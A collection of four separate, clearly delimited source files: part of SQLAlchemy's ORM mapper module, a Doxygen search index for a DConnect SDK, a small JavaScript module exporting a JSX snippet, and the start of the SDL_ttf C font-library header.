return self._filter_properties(properties.ColumnProperty)
@_memoized_configured_property
def relationships(self):
"""A namespace of all :class:`.RelationshipProperty` properties
maintained by this :class:`.Mapper`.
.. warning::
the :attr:`.Mapper.relationships` accessor namespace is an
instance of :class:`.OrderedProperties`. This is
a dictionary-like object which includes a small number of
named methods such as :meth:`.OrderedProperties.items`
and :meth:`.OrderedProperties.values`. When
accessing attributes dynamically, favor using the dict-access
scheme, e.g. ``mapper.relationships[somename]`` over
``getattr(mapper.relationships, somename)`` to avoid name
collisions.
.. seealso::
:attr:`.Mapper.attrs` - namespace of all :class:`.MapperProperty`
objects.
"""
return self._filter_properties(properties.RelationshipProperty)
@_memoized_configured_property
def composites(self):
"""Return a namespace of all :class:`.CompositeProperty`
properties maintained by this :class:`.Mapper`.
.. seealso::
:attr:`.Mapper.attrs` - namespace of all :class:`.MapperProperty`
objects.
"""
return self._filter_properties(properties.CompositeProperty)
def _filter_properties(self, type_):
if Mapper._new_mappers:
configure_mappers()
return util.ImmutableProperties(
util.OrderedDict(
(k, v) for k, v in self._props.items() if isinstance(v, type_)
)
)
@_memoized_configured_property
def _get_clause(self):
"""create a "get clause" based on the primary key. this is used
by query.get() and many-to-one lazyloads to load this item
by primary key.
"""
params = [
(primary_key, sql.bindparam(None, type_=primary_key.type))
for primary_key in self.primary_key
]
return (
sql.and_(*[k == v for (k, v) in params]),
util.column_dict(params),
)
@_memoized_configured_property
def _equivalent_columns(self):
"""Create a map of all equivalent columns, based on
the determination of column pairs that are equated to
one another based on inherit condition. This is designed
to work with the queries that util.polymorphic_union
comes up with, which often don't include the columns from
the base table directly (including the subclass table columns
only).
The resulting structure is a dictionary of columns mapped
to lists of equivalent columns, e.g.::
{
tablea.col1:
{tableb.col1, tablec.col1},
tablea.col2:
{tabled.col2}
}
"""
result = util.column_dict()
def visit_binary(binary):
if binary.operator == operators.eq:
if binary.left in result:
result[binary.left].add(binary.right)
else:
result[binary.left] = util.column_set((binary.right,))
if binary.right in result:
result[binary.right].add(binary.left)
else:
result[binary.right] = util.column_set((binary.left,))
for mapper in self.base_mapper.self_and_descendants:
if mapper.inherit_condition is not None:
visitors.traverse(
mapper.inherit_condition, {}, {"binary": visit_binary}
)
return result
def _is_userland_descriptor(self, obj):
if isinstance(
obj,
(
_MappedAttribute,
instrumentation.ClassManager,
expression.ColumnElement,
),
):
return False
else:
return True
def _should_exclude(self, name, assigned_name, local, column):
"""determine whether a particular property should be implicitly
present on the class.
This occurs when properties are propagated from an inherited class, or
are applied from the columns present in the mapped table.
"""
# check for class-bound attributes and/or descriptors,
# either local or from an inherited class
if local:
if self.class_.__dict__.get(
assigned_name, None
) is not None and self._is_userland_descriptor(
self.class_.__dict__[assigned_name]
):
return True
else:
attr = self.class_manager._get_class_attr_mro(assigned_name, None)
if attr is not None and self._is_userland_descriptor(attr):
return True
if (
self.include_properties is not None
and name not in self.include_properties
and (column is None or column not in self.include_properties)
):
self._log("not including property %s" % (name))
return True
if self.exclude_properties is not None and (
name in self.exclude_properties
or (column is not None and column in self.exclude_properties)
):
self._log("excluding property %s" % (name))
return True
return False
def common_parent(self, other):
"""Return true if the given mapper shares a
common inherited parent as this mapper."""
return self.base_mapper is other.base_mapper
def _canload(self, state, allow_subtypes):
s = self.primary_mapper()
if self.polymorphic_on is not None or allow_subtypes:
return _state_mapper(state).isa(s)
else:
return _state_mapper(state) is s
def isa(self, other):
"""Return True if the this mapper inherits from the given mapper."""
m = self
while m and m is not other:
m = m.inherits
return bool(m)
def iterate_to_root(self):
m = self
while m:
yield m
m = m.inherits
@_memoized_configured_property
def self_and_descendants(self):
"""The collection including this mapper and all descendant mappers.
This includes not just the immediately inheriting mappers but
all their inheriting mappers as well.
"""
descendants = []
stack = deque([self])
while stack:
item = stack.popleft()
descendants.append(item)
stack.extend(item._inheriting_mappers)
return util.WeakSequence(descendants)
def polymorphic_iterator(self):
"""Iterate through the collection including this mapper and
all descendant mappers.
This includes not just the immediately inheriting mappers but
all their inheriting mappers as well.
To iterate through an entire hierarchy, use
``mapper.base_mapper.polymorphic_iterator()``.
"""
return iter(self.self_and_descendants)
def primary_mapper(self):
"""Return the primary mapper corresponding to this mapper's class key
(class)."""
return self.class_manager.mapper
@property
def primary_base_mapper(self):
return self.class_manager.mapper.base_mapper
def _result_has_identity_key(self, result, adapter=None):
pk_cols = self.primary_key
if adapter:
pk_cols = [adapter.columns[c] for c in pk_cols]
for col in pk_cols:
if not result._has_key(col):
return False
else:
return True
def identity_key_from_row(self, row, identity_token=None, adapter=None):
"""Return an identity-map key for use in storing/retrieving an
item from the identity map.
:param row: A :class:`.RowProxy` instance. The columns which are
mapped by this :class:`.Mapper` should be locatable in the row,
preferably via the :class:`.Column` object directly (as is the case
when a :func:`.select` construct is executed), or via string names of
the form ``<tablename>_<colname>``.
"""
pk_cols = self.primary_key
if adapter:
pk_cols = [adapter.columns[c] for c in pk_cols]
return (
self._identity_class,
tuple(row[column] for column in pk_cols),
identity_token,
)
def identity_key_from_primary_key(self, primary_key, identity_token=None):
"""Return an identity-map key for use in storing/retrieving an
item from an identity map.
:param primary_key: A list of values indicating the identifier.
"""
return self._identity_class, tuple(primary_key), identity_token
def identity_key_from_instance(self, instance):
"""Return the identity key for the given instance, based on
its primary key attributes.
If the instance's state is expired, calling this method
will result in a database check to see if the object has been deleted.
If the row no longer exists,
:class:`~sqlalchemy.orm.exc.ObjectDeletedError` is raised.
This value is typically also found on the instance state under the
attribute name `key`.
"""
state = attributes.instance_state(instance)
return self._identity_key_from_state(state, attributes.PASSIVE_OFF)
def _identity_key_from_state(
self, state, passive=attributes.PASSIVE_RETURN_NEVER_SET
):
dict_ = state.dict
manager = state.manager
return (
self._identity_class,
tuple(
[
manager[prop.key].impl.get(state, dict_, passive)
for prop in self._identity_key_props
]
),
state.identity_token,
)
def primary_key_from_instance(self, instance):
"""Return the list of primary key values for the given
instance.
If the instance's state is expired, calling this method
will result in a database check to see if the object has been deleted.
If the row no longer exists,
:class:`~sqlalchemy.orm.exc.ObjectDeletedError` is raised.
"""
state = attributes.instance_state(instance)
identity_key = self._identity_key_from_state(
state, attributes.PASSIVE_OFF
)
return identity_key[1]
@_memoized_configured_property
def _identity_key_props(self):
return [self._columntoproperty[col] for col in self.primary_key]
@_memoized_configured_property
def _all_pk_props(self):
collection = set()
for table in self.tables:
collection.update(self._pks_by_table[table])
return collection
@_memoized_configured_property
def _should_undefer_in_wildcard(self):
cols = set(self.primary_key)
if self.polymorphic_on is not None:
cols.add(self.polymorphic_on)
return cols
@_memoized_configured_property
def _primary_key_propkeys(self):
return {prop.key for prop in self._all_pk_props}
def _get_state_attr_by_column(
self, state, dict_, column, passive=attributes.PASSIVE_RETURN_NEVER_SET
):
prop = self._columntoproperty[column]
return state.manager[prop.key].impl.get(state, dict_, passive=passive)
def _set_committed_state_attr_by_column(self, state, dict_, column, value):
prop = self._columntoproperty[column]
state.manager[prop.key].impl.set_committed_value(state, dict_, value)
def _set_state_attr_by_column(self, state, dict_, column, value):
prop = self._columntoproperty[column]
state.manager[prop.key].impl.set(state, dict_, value, None)
def _get_committed_attr_by_column(self, obj, column):
state = attributes.instance_state(obj)
dict_ = attributes.instance_dict(obj)
return self._get_committed_state_attr_by_column(
state, dict_, column, passive=attributes.PASSIVE_OFF
)
def _get_committed_state_attr_by_column(
self, state, dict_, column, passive=attributes.PASSIVE_RETURN_NEVER_SET
):
prop = self._columntoproperty[column]
return state.manager[prop.key].impl.get_committed_value(
state, dict_, passive=passive
)
def _optimized_get_statement(self, state, attribute_names):
"""assemble a WHERE clause which retrieves a given state by primary
key, using a minimized set of tables.
Applies to a joined-table inheritance mapper where the
requested attribute names are only present on joined tables,
not the base table. The WHERE clause attempts to include
only those tables to minimize joins.
"""
props = self._props
tables = set(
chain(
*[
sql_util.find_tables(c, check_columns=True)
for key in attribute_names
for c in props[key].columns
]
)
)
if self.base_mapper.local_table in tables:
return None
class ColumnsNotAvailable(Exception):
pass
def visit_binary(binary):
leftcol = binary.left
rightcol = binary.right
if leftcol is None or rightcol is None:
return
if leftcol.table not in tables:
leftval = self._get_committed_state_attr_by_column(
state,
state.dict,
leftcol,
passive=attributes.PASSIVE_NO_INITIALIZE,
)
if leftval in orm_util._none_set:
raise ColumnsNotAvailable()
binary.left = sql.bindparam(
None, leftval, type_=binary.right.type
)
elif rightcol.table not in tables:
rightval = self._get_committed_state_attr_by_column(
state,
state.dict,
rightcol,
passive=attributes.PASSIVE_NO_INITIALIZE,
)
if rightval in orm_util._none_set:
raise ColumnsNotAvailable()
binary.right = sql.bindparam(
None, rightval, type_=binary.right.type
)
allconds = []
try:
start = False
for mapper in reversed(list(self.iterate_to_root())):
if mapper.local_table in tables:
start = True
elif not isinstance(
mapper.local_table, expression.TableClause
):
return None
if start and not mapper.single:
allconds.append(
visitors.cloned_traverse(
mapper.inherit_condition,
{},
{"binary": visit_binary},
)
)
except ColumnsNotAvailable:
return None
cond = sql.and_(*allconds)
cols = []
for key in attribute_names:
cols.extend(props[key].columns)
return sql.select(cols, cond, use_labels=True)
def _iterate_to_target_viawpoly(self, mapper):
if self.isa(mapper):
prev = self
for m in self.iterate_to_root():
yield m
if m is not prev and prev not in m._with_polymorphic_mappers:
break
prev = m
if m is mapper:
break
def _should_selectin_load(self, enabled_via_opt, polymorphic_from):
if not enabled_via_opt:
# common case, takes place for all polymorphic loads
mapper = polymorphic_from
for m in self._iterate_to_target_viawpoly(mapper):
if m.polymorphic_load == "selectin":
return m
else:
# uncommon case, selectin load options were used
enabled_via_opt = set(enabled_via_opt)
enabled_via_opt_mappers = {e.mapper: e for e in enabled_via_opt}
for entity in enabled_via_opt.union([polymorphic_from]):
mapper = entity.mapper
for m in self._iterate_to_target_viawpoly(mapper):
if (
m.polymorphic_load == "selectin"
or m in enabled_via_opt_mappers
):
return enabled_via_opt_mappers.get(m, m)
return None
@util.dependencies(
"sqlalchemy.ext.baked", "sqlalchemy.orm.strategy_options"
)
def _subclass_load_via_in(self, baked, strategy_options, entity):
"""Assemble a BakedQuery that can load the columns local to
this subclass as a SELECT with IN.
"""
assert self.inherits
polymorphic_prop = self._columntoproperty[self.polymorphic_on]
keep_props = set([polymorphic_prop] + self._identity_key_props)
disable_opt = strategy_options.Load(entity)
enable_opt = strategy_options.Load(entity)
for prop in self.attrs:
if prop.parent is self or prop in keep_props:
# "enable" options, to turn on the properties that we want to
# load by default (subject to options from the query)
enable_opt.set_generic_strategy(
(prop.key,), dict(prop.strategy_key)
)
else:
# "disable" options, to turn off the properties from the
# superclass that we *don't* want to load, applied after
# the options from the query to override them
disable_opt.set_generic_strategy(
(prop.key,), {"do_nothing": True}
)
if len(self.primary_key) > 1:
in_expr = sql.tuple_(*self.primary_key)
else:
in_expr = self.primary_key[0]
if entity.is_aliased_class:
assert entity.mapper is self
q = baked.BakedQuery(
self._compiled_cache,
lambda session: session.query(entity)
.select_entity_from(entity.selectable)
._adapt_all_clauses(),
(self,),
)
q.spoil()
else:
q = baked.BakedQuery(
self._compiled_cache,
lambda session: session.query(self),
(self,),
)
q += lambda q: q.filter(
in_expr.in_(sql.bindparam("primary_keys", expanding=True))
).order_by(*self.primary_key)
return q, enable_opt, disable_opt
@_memoized_configured_property
def _subclass_load_via_in_mapper(self):
return self._subclass_load_via_in(self)
def cascade_iterator(self, type_, state, halt_on=None):
"""Iterate each element and its mapper in an object graph,
for all relationships that meet the given cascade rule.
:param type_:
The name of the cascade rule (i.e. ``"save-update"``, ``"delete"``,
etc.).
.. note:: the ``"all"`` cascade is not accepted here. For a generic
object traversal function, see :ref:`faq_walk_objects`.
:param state:
The lead InstanceState. child items will be processed per
the relationships defined for this object's mapper.
:return: the method yields individual object instances.
.. seealso::
:ref:`unitofwork_cascades`
:ref:`faq_walk_objects` - illustrates a generic function to
traverse all objects without relying on cascades.
"""
visited_states = set()
prp, mpp = object(), object()
assert state.mapper.isa(self)
visitables = deque(
[(deque(state.mapper._props.values()), prp, state, state.dict)]
)
while visitables:
iterator, item_type, parent_state, parent_dict = visitables[-1]
if not iterator:
visitables.pop()
continue
if item_type is prp:
prop = iterator.popleft()
if type_ not in prop.cascade:
continue
queue = deque(
prop.cascade_iterator(
type_,
parent_state,
parent_dict,
visited_states,
halt_on,
)
)
if queue:
visitables.append((queue, mpp, None, None))
elif item_type is mpp:
(
instance,
instance_mapper,
corresponding_state,
corresponding_dict,
) = iterator.popleft()
yield (
instance,
instance_mapper,
corresponding_state,
corresponding_dict,
)
visitables.append(
(
deque(instance_mapper._props.values()),
prp,
corresponding_state,
corresponding_dict,
)
)
@_memoized_configured_property
def _compiled_cache(self):
return util.LRUCache(self._compiled_cache_size)
@_memoized_configured_property
def _sorted_tables(self):
table_to_mapper = {}
for mapper in self.base_mapper.self_and_descendants:
for t in mapper.tables:
table_to_mapper.setdefault(t, mapper)
extra_dependencies = []
for table, mapper in table_to_mapper.items():
super_ = mapper.inherits
if super_:
extra_dependencies.extend(
[(super_table, table) for super_table in super_.tables]
)
def skip(fk):
# attempt to skip dependencies that are not
# significant to the inheritance chain
# for two tables that are related by inheritance.
# while that dependency may be important, it's technically
# not what we mean to sort on here.
parent = table_to_mapper.get(fk.parent.table)
dep = table_to_mapper.get(fk.column.table)
if (
parent is not None
and dep is not None
and dep is not parent
and dep.inherit_condition is not None
):
cols = set(sql_util._find_columns(dep.inherit_condition))
if parent.inherit_condition is not None:
cols = cols.union(
sql_util._find_columns(parent.inherit_condition)
)
return fk.parent not in cols and fk.column not in cols
else:
return fk.parent not in cols
return False
sorted_ = sql_util.sort_tables(
table_to_mapper,
skip_fn=skip,
extra_dependencies=extra_dependencies,
)
ret = util.OrderedDict()
for t in sorted_:
ret[t] = table_to_mapper[t]
return ret
def _memo(self, key, callable_):
if key in self._memoized_values:
return self._memoized_values[key]
else:
self._memoized_values[key] = value = callable_()
return value
@util.memoized_property
def _table_to_equated(self):
"""memoized map of tables to collections of columns to be
synchronized upwards to the base mapper."""
result = util.defaultdict(list)
for table in self._sorted_tables:
cols = set(table.c)
for m in self.iterate_to_root():
if m._inherits_equated_pairs and cols.intersection(
util.reduce(
set.union,
[l.proxy_set for l, r in m._inherits_equated_pairs],
)
):
result[table].append((m, m._inherits_equated_pairs))
return result
def configure_mappers():
"""Initialize the inter-mapper relationships of all mappers that
have been constructed thus far.
This function can be called any number of times, but in
most cases is invoked automatically, the first time mappings are used,
as well as whenever mappings are used and additional not-yet-configured
mappers have been constructed.
Points at which this occur include when a mapped class is instantiated
into an instance, as well as when the :meth:`.Session.query` method
is used.
The :func:`.configure_mappers` function provides several event hooks
that can be used to augment its functionality. These methods include:
* :meth:`.MapperEvents.before_configured` - called once before
:func:`.configure_mappers` does any work; this can be used to establish
additional options, properties, or related mappings before the operation
proceeds.
* :meth:`.MapperEvents.mapper_configured` - called as each indivudal
:class:`.Mapper` is configured within the process; will include all
mapper state except for backrefs set up by other mappers that are still
to be configured.
* :meth:`.MapperEvents.after_configured` - called once after
:func:`.configure_mappers` is complete; at this stage, all
:class:`.Mapper` objects that are known to SQLAlchemy will be fully
configured. Note that the calling application may still have other
mappings that haven't been produced yet, such as if they are in modules
as yet unimported.
"""
if not Mapper._new_mappers:
return
_CONFIGURE_MUTEX.acquire()
try:
global _already_compiling
if _already_compiling:
return
_already_compiling = True
try:
# double-check inside mutex
if not Mapper._new_mappers:
return
has_skip = False
Mapper.dispatch._for_class(Mapper).before_configured()
# initialize properties on all mappers
# note that _mapper_registry is unordered, which
# may randomly conceal/reveal issues related to
# the order of mapper compilation
for mapper in list(_mapper_registry):
run_configure = None
for fn in mapper.dispatch.before_mapper_configured:
run_configure = fn(mapper, mapper.class_)
if run_configure is EXT_SKIP:
has_skip = True
break
if run_configure is EXT_SKIP:
continue
if getattr(mapper, "_configure_failed", False):
e = sa_exc.InvalidRequestError(
"One or more mappers failed to initialize - "
"can't proceed with initialization of other "
"mappers. Triggering mapper: '%s'. "
"Original exception was: %s"
% (mapper, mapper._configure_failed)
)
e._configure_failed = mapper._configure_failed
raise e
if not mapper.configured:
try:
mapper._post_configure_properties()
mapper._expire_memoizations()
mapper.dispatch.mapper_configured(
mapper, mapper.class_
)
except Exception:
exc = sys.exc_info()[1]
if not hasattr(exc, "_configure_failed"):
mapper._configure_failed = exc
raise
if not has_skip:
Mapper._new_mappers = False
finally:
_already_compiling = False
finally:
_CONFIGURE_MUTEX.release()
Mapper.dispatch._for_class(Mapper).after_configured()
def reconstructor(fn):
"""Decorate a method as the 'reconstructor' hook.
Designates a method as the "reconstructor", an ``__init__``-like
method that will be called by the ORM after the instance has been
loaded from the database or otherwise reconstituted.
The reconstructor will be invoked with no arguments. Scalar
(non-collection) database-mapped attributes of the instance will
be available for use within the function. Eagerly-loaded
collections are generally not yet available and will usually only
contain the first element. ORM state changes made to objects at
this stage will not be recorded for the next flush() operation, so
the activity within a reconstructor should be conservative.
.. seealso::
:ref:`mapping_constructors`
:meth:`.InstanceEvents.load`
"""
fn.__sa_reconstructor__ = True
return fn
def validates(*names, **kw):
r"""Decorate a method as a 'validator' for one or more named properties.
Designates a method as a validator, a method which receives the
name of the attribute as well as a value to be assigned, or in the
case of a collection, the value to be added to the collection.
The function can then raise validation exceptions to halt the
process from continuing (where Python's built-in ``ValueError``
and ``AssertionError`` exceptions are reasonable choices), or can
modify or replace the value before proceeding. The function should
otherwise return the given value.
Note that a validator for a collection **cannot** issue a load of that
collection within the validation routine - this usage raises
an assertion to avoid recursion overflows. This is a reentrant
condition which is not supported.
:param \*names: list of attribute names to be validated.
:param include_removes: if True, "remove" events will be
sent as well - the validation function must accept an additional
argument "is_remove" which will be a boolean.
.. versionadded:: 0.7.7
:param include_backrefs: defaults to ``True``; if ``False``, the
validation function will not emit if the originator is an attribute
event related via a backref. This can be used for bi-directional
:func:`.validates` usage where only one validator should emit per
attribute operation.
.. versionadded:: 0.9.0
.. seealso::
:ref:`simple_validators` - usage examples for :func:`.validates`
"""
include_removes = kw.pop("include_removes", False)
include_backrefs = kw.pop("include_backrefs", True)
def wrap(fn):
fn.__sa_validators__ = names
fn.__sa_validation_opts__ = {
"include_removes": include_removes,
"include_backrefs": include_backrefs,
}
return fn
return wrap
def _event_on_load(state, ctx):
instrumenting_mapper = state.manager.info[_INSTRUMENTOR]
if instrumenting_mapper._reconstructor:
instrumenting_mapper._reconstructor(state.obj())
def _event_on_first_init(manager, cls):
"""Initial mapper compilation trigger.
instrumentation calls this one when InstanceState
is first generated, and is needed for legacy mutable
attributes to work.
"""
instrumenting_mapper = manager.info.get(_INSTRUMENTOR)
if instrumenting_mapper:
if Mapper._new_mappers:
configure_mappers()
def _event_on_init(state, args, kwargs):
"""Run init_instance hooks.
This also includes mapper compilation, normally not needed
here but helps with some piecemeal configuration
scenarios (such as in the ORM tutorial).
"""
instrumenting_mapper = state.manager.info.get(_INSTRUMENTOR)
if instrumenting_mapper:
if Mapper._new_mappers:
configure_mappers()
if instrumenting_mapper._set_polymorphic_identity:
instrumenting_mapper._set_polymorphic_identity(state)
class _ColumnMapping(dict):
"""Error reporting helper for mapper._columntoproperty."""
__slots__ = ("mapper",)
def __init__(self, mapper):
self.mapper = mapper
def __missing__(self, column):
prop = self.mapper._props.get(column)
if prop:
raise orm_exc.UnmappedColumnError(
"Column '%s.%s' is not available, due to "
"conflicting property '%s':%r"
% (column.table.name, column.name, column.key, prop)
)
raise orm_exc.UnmappedColumnError(
"No column %s is configured on mapper %s..."
% (column, self.mapper)
)
|
var searchData=
[
['refreshaccesstokenwithclientid_3aorigin_3aappname_3ascopes_3asuccess_3aerror_3a',['refreshAccessTokenWithClientId:origin:appName:scopes:success:error:',['../df/d9b/interface_d_connect_util.html#a7ff60c6dbb49d5f5cc1d2b8fb88ca38b',1,'DConnectUtil']]],
['registereventwithrequest_3aresponsehandler_3amessagehandler_3a',['registerEventWithRequest:responseHandler:messageHandler:',['../da/d20/interface_d_connect_event_helper.html#adc56ee6b08ce436c5ff8a8eff23623bf',1,'DConnectEventHelper']]],
['removeall',['removeAll',['../d4/d3f/protocol_d_connect_event_cache_controller_01-p.html#a2055865a5e52ee1bd0f9bc92b41c2058',1,'DConnectEventCacheController -p::removeAll()'],['../de/dcb/interface_d_connect_event_manager.html#a5f122d2d0381720dd82c7bbd4ab0a47a',1,'DConnectEventManager::removeAll()']]],
['removeallservices',['removeAllServices',['../d2/d95/interface_d_connect_service_provider.html#a5843305260efff300ff4648130474c48',1,'DConnectServiceProvider']]],
['removeapi_3a',['removeApi:',['../d6/d26/interface_d_connect_profile.html#aed859143bfad17e74db13ca725256044',1,'DConnectProfile']]],
['removebutton',['removeButton',['../da/d40/interface_d_connect_service_list_view_controller.html#aca602056738d3bed761eca7d86bbbe7a',1,'DConnectServiceListViewController']]],
['removeevent_3a',['removeEvent:',['../d4/d3f/protocol_d_connect_event_cache_controller_01-p.html#a6bfbf65a312578f882e0169a9754ad15',1,'DConnectEventCacheController -p']]],
['removeeventforrequest_3a',['removeEventForRequest:',['../de/dcb/interface_d_connect_event_manager.html#af412d2301e4cdb1bd9b69d639421b0e4',1,'DConnectEventManager']]],
['removeeventsfororigin_3a',['removeEventsForOrigin:',['../d4/d3f/protocol_d_connect_event_cache_controller_01-p.html#a8cf241e326d0d5455bddeaa8050a4cf8',1,'DConnectEventCacheController -p::removeEventsForOrigin:()'],['../de/dcb/interface_d_connect_event_manager.html#a327571eb8bc35b8aa62a13ba33733133',1,'DConnectEventManager::removeEventsForOrigin:()']]],
['removefileforpath_3a',['removeFileForPath:',['../d2/d0f/interface_d_connect_file_manager.html#a63451d20135499fbcc85a114ebd66309',1,'DConnectFileManager']]],
['removeprofile_3a',['removeProfile:',['../d4/de4/interface_d_connect_profile_provider.html#af7f67effc7a9bfa543be89d074331bd5',1,'DConnectProfileProvider']]],
['removeservice_3a',['removeService:',['../d2/d95/interface_d_connect_service_provider.html#ac5ae7b33b6f9298d91d86bc740e278fa',1,'DConnectServiceProvider']]],
['removeservicelistener_3a',['removeServiceListener:',['../d2/d95/interface_d_connect_service_provider.html#aa96e84eac9a5135830dede88b38aaf97',1,'DConnectServiceProvider']]],
['requestformessage_3a',['requestForMessage:',['../d2/d91/interface_d_connect_message_factory.html#a22ce1696aa2fbe8d7825cab1777802a9',1,'DConnectMessageFactory']]],
['requestparamspeclist',['requestParamSpecList',['../dd/d67/interface_d_connect_api_spec.html#a0075b1cb9eec5380a44a4d78a0bb4931',1,'DConnectApiSpec']]],
['requiresorigin',['requiresOrigin',['../d0/d4e/interface_d_connect_manager.html#ac2fb952347cecf1068e6b74608a75366',1,'DConnectManager']]],
['result',['result',['../df/d9a/interface_d_connect_response_message.html#ace2c16849bba75fc274a940720e2e048',1,'DConnectResponseMessage']]]
];
|
const code = `<div className='App'>
<Windows
dashboard={dashboard}
windows={{ ...this.props.windows }}
onClose={this.props.removeWindow}
order={this.props.order}
active={this.props.active}
setActive={this.props.setActive}
/>
</div>`
export default code
|
/*
SDL_ttf: A companion library to SDL for working with TrueType (tm) fonts
Copyright (C) 2001-2022 Sam Lantinga <[email protected]>
This software is provided 'as-is', without any express or implied
warranty. In no event will the authors be held liable for any damages
arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it
freely, subject to the following restrictions:
1. The origin of this software must not be misrepresented; you must not
claim that you wrote the original software. If you use this software
in a product, an acknowledgment in the product documentation would be
appreciated but is not required.
2. Altered source versions must be plainly marked as such, and must not be
misrepresented as being the original software.
3. This notice may not be removed or altered from any source distribution.
*/
/* This library is a wrapper around the excellent FreeType 2.0 library,
available at:
http://www.freetype.org/
*/
/* Note: In many places, SDL_ttf will say "glyph" when it means "code point."
Unicode is hard, we learn as we go, and we apologize for adding to the
confusion. */
#ifndef SDL_TTF_H_
#define SDL_TTF_H_
#include "SDL.h"
#include "begin_code.h"
/* Set up for C function definitions, even when using C++ */
#ifdef __cplusplus
extern "C" {
#endif
/* Printable format: "%d.%d.%d", MAJOR, MINOR, PATCHLEVEL
*/
#define SDL_TTF_MAJOR_VERSION 2
#define SDL_TTF_MINOR_VERSION 0
#define SDL_TTF_PATCHLEVEL 18
/* This macro can be used to fill a version structure with the compile-time
* version of the SDL_ttf library.
*/
#define SDL_TTF_VERSION(X) \
{ \
(X)->major = SDL_TTF_MAJOR_VERSION; \
(X)->minor = SDL_TTF_MINOR_VERSION; \
(X)->patch = SDL_TTF_PATCHLEVEL; \
}
/* Backwards compatibility */
#define TTF_MAJOR_VERSION SDL_TTF_MAJOR_VERSION
#define TTF_MINOR_VERSION SDL_TTF_MINOR_VERSION
#define TTF_PATCHLEVEL SDL_TTF_PATCHLEVEL
#define TTF_VERSION(X) SDL_TTF_VERSION(X)
/**
* This is the version number macro for the current SDL_ttf version.
*/
#define SDL_TTF_COMPILEDVERSION \
SDL_VERSIONNUM(SDL_TTF_MAJOR_VERSION, SDL_TTF_MINOR_VERSION, SDL_TTF_PATCHLEVEL)
/**
* This macro will evaluate to true if compiled with SDL_ttf at least X.Y.Z.
*/
#define SDL_TTF_VERSION_ATLEAST(X, Y, Z) \
(SDL_TTF_COMPILEDVERSION >= SDL_VERSIONNUM(X, Y, Z))
/* Make sure this is defined (only available in newer SDL versions) */
#ifndef SDL_DEPRECATED
#define SDL_DEPRECATED
#endif
/* This function gets the version of the dynamically linked SDL_ttf library.
it should NOT be used to fill a version structure, instead you should
use the SDL_TTF_VERSION() macro.
*/
extern DECLSPEC const SDL_version * SDLCALL TTF_Linked_Version(void);
/* This function stores the version of the FreeType2 library in use.
TTF_Init() should be called before calling this function.
*/
extern DECLSPEC void SDLCALL TTF_GetFreeTypeVersion(int *major, int *minor, int *patch);
/* This function stores the version of the HarfBuzz library in use,
or 0 if HarfBuzz is not available.
*/
extern DECLSPEC void SDLCALL TTF_GetHarfBuzzVersion(int *major, int *minor, int *patch);
/* ZERO WIDTH NO-BREAKSPACE (Unicode byte order mark) */
#define UNICODE_BOM_NATIVE 0xFEFF
#define UNICODE_BOM_SWAPPED 0xFFFE
/* This function tells the library whether UNICODE text is generally
byteswapped. A UNICODE BOM character in a string will override
this setting for the remainder of that string.
*/
extern DECLSPEC void SDLCALL TTF_ByteSwappedUNICODE(SDL_bool swapped);
/* The internal structure containing font information */
typedef struct _TTF_Font TTF_Font;
/* Initialize the TTF engine - returns 0 if successful, -1 on error */
extern DECLSPEC int SDLCALL TTF_Init(void);
/* Open a font file and create a font of the specified point size.
* Some .fon fonts will have several sizes embedded in the file, so the
* point size becomes the index of choosing which size. If the value
* is too high, the last indexed size will be the default. */
extern DECLSPEC TTF_Font * SDLCALL TTF_OpenFont(const char *file, int ptsize);
extern DECLSPEC TTF_Font * SDLCALL TTF_OpenFontIndex(const char *file, int ptsize, long index);
/* Open a font file from a SDL_RWops: 'src' must be kept alive for the lifetime of the TTF_Font.
* 'freesrc' can be set so that TTF_CloseFont closes the RWops */
extern DECLSPEC TTF_Font * SDLCALL TTF_OpenFontRW(SDL_RWops *src, int freesrc, int ptsize);
extern DECLSPEC TTF_Font * SDLCALL TTF_OpenFontIndexRW(SDL_RWops *src, int freesrc, int ptsize, long index);
/* Opens a font using the given horizontal and vertical target resolutions (in DPI).
* DPI scaling only applies to scalable fonts (e.g. TrueType). */
extern DECLSPEC TTF_Font * SDLCALL TTF_OpenFontDPI(const char *file, int ptsize, unsigned int hdpi, unsigned int vdpi);
extern DECLSPEC TTF_Font * SDLCALL TTF_OpenFontIndexDPI(const char *file, int ptsize, long index, unsigned int hdpi, unsigned int vdpi);
extern DECLSPEC TTF_Font * SDLCALL TTF_OpenFontDPIRW(SDL_RWops *src, int freesrc, int ptsize, unsigned int hdpi, unsigned int vdpi);
extern DECLSPEC TTF_Font * SDLCALL TTF_OpenFontIndexDPIRW(SDL_RWops *src, int freesrc, int ptsize, long index, unsigned int hdpi, unsigned int vdpi);
/* Set font size dynamically. This clears already generated glyphs, if any, from the cache. */
extern DECLSPEC int SDLCALL TTF_SetFontSize(TTF_Font *font, int ptsize);
extern DECLSPEC int SDLCALL TTF_SetFontSizeDPI(TTF_Font *font, int ptsize, unsigned int hdpi, unsigned int vdpi);
/* Set and retrieve the font style. Setting the style clears already generated glyphs, if any, from the cache. */
#define TTF_STYLE_NORMAL 0x00
#define TTF_STYLE_BOLD 0x01
#define TTF_STYLE_ITALIC 0x02
#define TTF_STYLE_UNDERLINE 0x04
#define TTF_STYLE_STRIKETHROUGH 0x08
extern DECLSPEC int SDLCALL TTF_GetFontStyle(const TTF_Font *font);
extern DECLSPEC void SDLCALL TTF_SetFontStyle(TTF_Font *font, int style);
extern DECLSPEC int SDLCALL TTF_GetFontOutline(const TTF_Font *font);
extern DECLSPEC void SDLCALL TTF_SetFontOutline(TTF_Font *font, int outline);
/* Set and retrieve FreeType hinter settings. Setting it clears already generated glyphs, if any, from the cache. */
#define TTF_HINTING_NORMAL 0
#define TTF_HINTING_LIGHT 1
#define TTF_HINTING_MONO 2
#define TTF_HINTING_NONE 3
#define TTF_HINTING_LIGHT_SUBPIXEL 4
extern DECLSPEC int SDLCALL TTF_GetFontHinting(const TTF_Font *font);
extern DECLSPEC void SDLCALL TTF_SetFontHinting(TTF_Font *font, int hinting);
/* Get the total height of the font - usually equal to point size */
extern DECLSPEC int SDLCALL TTF_FontHeight(const TTF_Font *font);
/* Get the offset from the baseline to the top of the font
This is a positive value, relative to the baseline.
*/
extern DECLSPEC int SDLCALL TTF_FontAscent(const TTF_Font *font);
/* Get the offset from the baseline to the bottom of the font
This is a negative value, relative to the baseline.
*/
extern DECLSPEC int SDLCALL TTF_FontDescent(const TTF_Font *font);
/* Get the recommended spacing between lines of text for this font */
extern DECLSPEC int SDLCALL TTF_FontLineSkip(const TTF_Font *font);
